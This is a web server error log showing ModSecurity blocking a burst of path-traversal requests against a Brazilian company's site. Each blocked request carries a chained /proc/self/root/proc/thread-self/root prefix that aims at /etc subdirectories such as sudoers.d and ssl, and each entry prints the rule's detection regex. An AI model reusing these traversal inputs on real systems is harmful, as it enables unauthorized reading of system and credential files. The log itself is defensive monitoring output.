[Fri Mar 20 03:36:19.517965 2026] [:error] [pid 7235:tid 140411599251200] [client 74.7.241.31:60428] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzq4_qxLDW4GITHUkSwQAAAARE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 03:36:23.994891 2026] [:error] [pid 7893:tid 140411582465792] [client 74.7.241.31:60436] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzq5xCii7xarUs8iHYyMQAAAhM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 03:36:26.384938 2026] [:error] [pid 26799:tid 140411658000128] [client 74.7.241.31:60448] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzq6ta6ubjKNq_cu4acjgAAA0o"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 03:36:27.647339 2026] [:error] [pid 21219:tid 140411599251200] [client 74.7.241.31:38898] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzq6_XLqtnMIWvjpaJnNAAAApE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 03:36:28.917692 2026] [:error] [pid 31215:tid 140411540502272] [client 74.7.241.31:38906] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzq7AF0L0L-SsrnPo42NwAAAtg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 03:36:31.016473 2026] [:error] [pid 26799:tid 140411674785536] [client 74.7.241.31:38910] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzq7ta6ubjKNq_cu4aclQAAA0g"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 03:36:32.429827 2026] [:error] [pid 15826:tid 140411548894976] [client 74.7.241.31:38926] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzq8OoXxyEfFpUF8f9SLwAAAVc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 03:36:33.739276 2026] [:error] [pid 7235:tid 140411557287680] [client 74.7.241.31:38936] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzq8fqxLDW4GITHUkSwQQAAARY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 03:36:33.862958 2026] [mime_magic:error] [pid 7893:tid 140411741927168] (70014)End of file found: [client 66.249.74.169:61010] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 03:36:35.134857 2026] [:error] [pid 15826:tid 140411691570944] [client 74.7.241.31:38940] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzq8-oXxyEfFpUF8f9SMwAAAUY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 03:36:36.419403 2026] [:error] [pid 7893:tid 140411607643904] [client 74.7.241.31:38956] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzq9BCii7xarUs8iHYyOgAAAhA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 03:36:38.496022 2026] [:error] [pid 10189:tid 140411641214720] [client 74.7.243.128:32860] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzq9DJ3M9BSuKP7CAbeIQAAAIw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 03:36:38.497010 2026] [:error] [pid 10189:tid 140411557287680] [client 74.7.241.31:57704] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzq9TJ3M9BSuKP7CAbeIgAAAJY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 03:36:40.979435 2026] [:error] [pid 9818:tid 140411708356352] [client 74.7.241.31:57706] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzq-F1pVZ5mVmJwsFP_mwAAAEQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 03:36:44.322805 2026] [:error] [pid 21219:tid 140411741927168] [client 74.7.241.31:57720] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzq_PXLqtnMIWvjpaJnPQAAAoA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 03:36:45.626844 2026] [:error] [pid 15826:tid 140411658000128] [client 74.7.241.31:57724] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzq_eoXxyEfFpUF8f9SNwAAAUo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 03:36:46.935018 2026] [:error] [pid 11642:tid 140411658000128] [client 74.7.241.31:57736] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzq_rninkcc-iUj5AosKQAAA4o"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 03:36:49.275282 2026] [:error] [pid 10189:tid 140411725141760] [client 74.7.241.31:33316] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzrATJ3M9BSuKP7CAbeKQAAAII"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 03:36:52.602193 2026] [:error] [pid 10189:tid 140411691570944] [client 74.7.241.31:33332] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/modsecurity"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzrBDJ3M9BSuKP7CAbeLwAAAIY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 03:36:56.099270 2026] [:error] [pid 15826:tid 140411716749056] [client 74.7.241.31:33340] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzrCOoXxyEfFpUF8f9SQAAAAUM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 03:36:59.079009 2026] [:error] [pid 31215:tid 140411691570944] [client 74.7.241.31:46970] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/default"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzrCwF0L0L-SsrnPo42RwAAAsY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 03:37:03.972072 2026] [:error] [pid 21219:tid 140411557287680] [client 74.7.241.31:46980] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/php-fpm.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzrDvXLqtnMIWvjpaJnTgAAApY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 03:37:11.961334 2026] [:error] [pid 9818:tid 140411691570944] [client 74.7.241.31:46994] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/bash_completion.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzrF11pVZ5mVmJwsFP_xgAAAEY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
